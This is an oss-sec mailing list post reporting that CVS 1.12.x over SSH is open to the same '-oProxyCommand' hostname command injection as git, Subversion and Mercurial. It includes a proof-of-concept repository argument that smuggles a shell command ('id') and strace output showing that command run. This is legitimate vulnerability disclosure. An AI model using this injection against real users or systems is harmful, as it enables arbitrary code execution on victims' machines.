oss-sec mailing list archives
CVS and ssh command injection (see CVE-2017-1000117, etc.)
From: Hank Leininger <hlein () korelogic com>
Date: Thu, 10 Aug 2017 17:32:24 -0600
SSH command injection via -o... impacts CVS 1.12.x as well, if anybody still cares. The announcement for git mentions CVE-2017-1000117, CVE-2017-9800, and CVE-2017-1000116 for git, Subversion, Mercurial, but makes no mention of CVS. None of those CVEs are currently viewable at https://cve.mitre.org/cgi-bin/cvename.cgi?name= , and I don't know if these were discussed on a private list prior to publication, and whether that discussion included CVS. CVS can be configured to use SSH for remote repos, such as with CVS_RSH=ssh. In which case specifying a hostname of -o... triggers the same sort of thing: $ strace -f -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada 2>&1 | egrep id execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffe69f75a68 /* 139 vars */) = 0 [snip] [pid 20003] execve("/usr/local/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */) = -1 ENOENT (No such file or directory) [pid 20003] execve("/usr/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */) = 0 [pid 20004] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x32af5f10d0 /* 141 vars */) = 0 [pid 20004] execve("/usr/bin/id", ["id"], 0xec92226ae0 /* 141 vars */) = 0 [pid 20004] +++ exited with 0 +++ [pid 20003] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=20004, si_uid=3612, si_status=0, si_utime=0, si_stime=0} --- ssh_exchange_identification: Connection closed by remote host [pid 20003] +++ exited with 255 +++ --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=20003, si_uid=3612, si_status=255, si_utime=0, si_stime=0} --- Tested vanilla 1.12.13, and Gentoo 1.12.12-r11. Of course, the repo specification looks very odd, so tricking a victim may be harder than for SCM tools where it's prefixed by an ssh:// or masked behind a redirect. Plus, first you would have find a victim. Thanks, -- Hank Leininger <hlein () korelogic com> 5F6D DCC8 FF53 8093 EC39 127B 091E 7F7C E898 E86C
Attachment:
signature.asc
Description: Digital signature
Current thread:
- CVS and ssh command injection (see CVE-2017-1000117, etc.) Hank Leininger (Aug 10)
- Re: CVS and ssh command injection (see CVE-2017-1000117, etc.) Andreas Stieger (Aug 11)
- Re: CVS and ssh command injection (see CVE-2017-1000117, etc.) Salvatore Bonaccorso (Aug 11)
- Re: CVS and ssh command injection (see CVE-2017-1000117, etc.) Salvatore Bonaccorso (Aug 11)
- Re: CVS and ssh command injection (see CVE-2017-1000117, etc.) Salvatore Bonaccorso (Aug 11)
- Re: CVS and ssh command injection (see CVE-2017-1000117, etc.) Hanno Böck (Aug 20)
- Re: CVS and ssh command injection (see CVE-2017-1000117, etc.) Andreas Stieger (Aug 11)